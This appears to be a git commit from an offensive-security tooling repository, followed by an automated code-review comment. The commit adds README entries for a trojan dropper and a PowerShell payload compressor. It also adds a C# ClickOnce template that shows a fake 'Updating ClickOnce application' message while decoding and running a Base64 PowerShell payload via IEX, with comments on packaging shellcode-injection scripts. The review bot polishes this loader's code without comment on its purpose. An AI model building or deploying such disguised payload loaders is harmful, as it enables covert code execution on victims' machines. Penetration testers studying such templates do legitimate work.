	Added ClickOnce SharpPick template.
		@@ -4,6 +4,8 @@
 | 
			
		||||
 | 
			
		||||
- **`backdoor-drop.js`** - Internet Explorer - JavaScript trojan/backdoor dropper template, to be used during Penetration Testing assessments. ([gist](https://gist.github.com/mgeeky/b0aed7c1e510560db50f96604b150dac))
 | 
			
		||||
 | 
			
		||||
- **`clickOnceSharpPickTemplate.cs`** - This is a template for **C# Console Project** containing [SharpPick](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) technique of loading Powershell code from within C# application. The ClickOnce concept is to generate a windows self-updating Application that is specially privileged ([ClickOnce](https://www.slideshare.net/NetSPI/all-you-need-is-one-a-click-once-love-story-secure360-2015))
 | 
			
		||||
 | 
			
		||||
- **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX)
 | 
			
		||||
. ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc))
 | 
			
		||||
 | 
			
		||||
 
 | 
			
		||||
							
								
								
									
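--- /dev/null
+++ b/social-engineering/clickOnceSharpPickTemplate.cs
@@ -0,0 +1,69 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.IO;
+using System.Resources;
+using System.Net;
+
+using System.Collections.ObjectModel;
+
+//
+// Use NuGet to install System.Management.Automation reference.
+//
+using System.Management.Automation;
+using System.Management.Automation.Runspaces;
+
+namespace ConsoleApplication2
+{
+    class Program
+    {
+        //
+        // This function and concept comes from PowerPick / SharpPick project by Sixdub:
+        //      https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick
+        //
+        static string RunPS(string cmd)
+        {
+            // Init stuff
+            Runspace runspace = RunspaceFactory.CreateRunspace();
+            runspace.Open();
+            RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
+            Pipeline pipeline = runspace.CreatePipeline();
+
+            // Add commands
+            pipeline.Commands.AddScript(cmd);
+
+            // Prep PS for string output and invoke
+            pipeline.Commands.Add("Out-String");
+            Collection<PSObject> results = pipeline.Invoke();
+            runspace.Close();
+
+            // Convert records to strings
+            StringBuilder stringBuilder = new StringBuilder();
+            foreach (PSObject obj in results)
+            {
+                stringBuilder.Append(obj);
+            }
+            return stringBuilder.ToString().Trim();
+        }
+
+        static void Main()
+        {
+            Console.WriteLine("Updating ClickOnce application. Please wait...");
+
+            //
+            // Here comes your Base64 encoded Powershell payload.
+			// A good example of what to stick in here is a modified Invoke-Shellcode.ps1
+			// that will spawn a process and insert there some shellcode.
+			// You can prepare Base64 UTF8 shellcode via:
+			//		PS> $text = Get-Content yourShellcode.ps1
+			//		PS> $bytes = [System.Text.Encoding]::Unicode.GetBytes($text);
+			//		PS> $encoded = [Convert]::ToBase64String($bytes);
+			//		PS> $encoded | Out-File "myEncodedShellcode.ps1"
+            //
+            String base64encodedPayload = "<INSERT HERE YOUR BASE64 ENCODED POWERSHELL PAYLOAD>";
+
+            RunPS("IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"" + base64encodedPayload + "\")))");
+        }
+    }
+}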
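Review bot: In RunPS, `RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);` is created and never used, and neither `runspace` nor `pipeline` is disposed — `runspace.Close()` sits after `pipeline.Invoke()`, so if the invocation throws the runspace is left open and the method exits without cleanup. Drop the unused `scriptInvoker` line and hold the two objects in using blocks, `using (Runspace runspace = RunspaceFactory.CreateRunspace())` and `using (Pipeline pipeline = runspace.CreatePipeline())`, so disposal happens on every exit path. In Main, `String base64encodedPayload` would read more consistently as the `string` alias that the RunPS signature already uses.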